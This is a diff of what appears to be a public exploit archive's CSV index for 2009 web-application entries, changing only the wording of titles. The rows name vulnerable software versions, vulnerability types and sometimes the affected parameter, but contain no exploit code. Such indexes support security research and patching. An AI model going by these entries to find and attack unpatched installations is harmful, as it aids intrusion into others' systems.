Vulnerabilities",2009-02-13,nuclear,php,webapps,0 +8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0 -8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - (info.php item) SQL Command Injection",2009-02-13,Osirys,php,webapps,0 +8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - info.php item SQL Command Injection",2009-02-13,Osirys,php,webapps,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0 -8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 +8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0 @@ -20664,7 +20667,7 @@ id,file,description,date,author,platform,type,port 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 -8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0 +8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection (via SQL Injection)",2009-02-20,Osirys,php,webapps,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 @@ -20684,7 +20687,7 @@ id,file,description,date,author,platform,type,port 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 -8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 +8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 @@ -20694,25 +20697,25 @@ id,file,description,date,author,platform,type,port 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 -8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 +8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 -8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 -8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 +8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0 +8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 -8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 - (Remote File Inclusion / Local File Inclusion / Authentication Bypass) Multiple Vulnerabilities",2009-03-06,"Salvatore Fresta",php,webapps,0 +8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass",2009-03-06,"Salvatore Fresta",php,webapps,0 8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php id' SQL Injection",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 -8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0 +8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (SQL into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0 -8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 +8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' Parameter SQL Injection",2009-03-09,elusiven,php,webapps,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' Parameter SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 @@ -20721,9 +20724,9 @@ id,file,description,date,author,platform,type,port 8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",php,webapps,0 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - 'cookie' Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 -8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 +8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - Cross-Site Scripting / SQL Injection",2009-03-12,XaDoS,php,webapps,0 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 -8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 +8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - Authentication Bypass",2009-03-13,"Virangar Security",php,webapps,0 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0 @@ -20736,17 +20739,17 @@ id,file,description,date,author,platform,type,port 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0 -8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 +8243,platforms/php/webapps/8243.txt,"Bloginator 1a - Cookie Bypass / SQL Injection",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 -8252,platforms/php/webapps/8252.txt,"Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 +8252,platforms/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",php,webapps,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 -8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0 -8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 +8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,php,webapps,0 +8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Injection",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0 @@ -20755,7 +20758,7 @@ id,file,description,date,author,platform,type,port 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - (upldgallery.php) Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps,0 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0 -8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0 +8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 @@ -20764,7 +20767,7 @@ id,file,description,date,author,platform,type,port 8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0 -8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities",2009-03-30,AnGeL25dZ,asp,webapps,0 +8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps,0 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - 'members.php' SQL Injection",2009-03-30,SirGod,php,webapps,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,php,webapps,0 @@ -20822,8 +20825,8 @@ id,file,description,date,author,platform,type,port 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Parameter Local File Inclusion",2009-04-14,zxvf,php,webapps,0 -8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 -8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 +8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,php,webapps,0 +8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,php,webapps,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 @@ -20859,13 +20862,13 @@ id,file,description,date,author,platform,type,port 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 -8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 +8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 -8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 +8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 @@ -20873,28 +20876,28 @@ id,file,description,date,author,platform,type,port 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 -8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 +8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - Local File Inclusion / SQL Injection",2009-04-21,SirGod,php,webapps,0 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0 8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0 -8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 +8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0 8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0 8517,platforms/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0 -8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 +8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0 8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Password Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0 -8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 +8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",php,webapps,0 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],php,webapps,0 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - 'route' Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0 -8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 +8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 @@ -20913,7 +20916,7 @@ id,file,description,date,author,platform,type,port 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0 -8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 +8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 @@ -20928,7 +20931,7 @@ id,file,description,date,author,platform,type,port 8608,platforms/php/webapps/8608.txt,"projectCMS 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (Guestbook.mdb) Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,php,webapps,0 8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,asp,webapps,0 -8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 +8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-05,YEnH4ckEr,php,webapps,0 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps,0 8618,platforms/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie Grabber",2009-05-05,SirGod,php,webapps,0 8619,platforms/php/webapps/8619.txt,"Joomla! Component Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,php,webapps,0 @@ -20949,7 +20952,7 @@ id,file,description,date,author,platform,type,port 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 -8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 +8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0 8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 @@ -20980,8 +20983,8 @@ id,file,description,date,author,platform,type,port 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 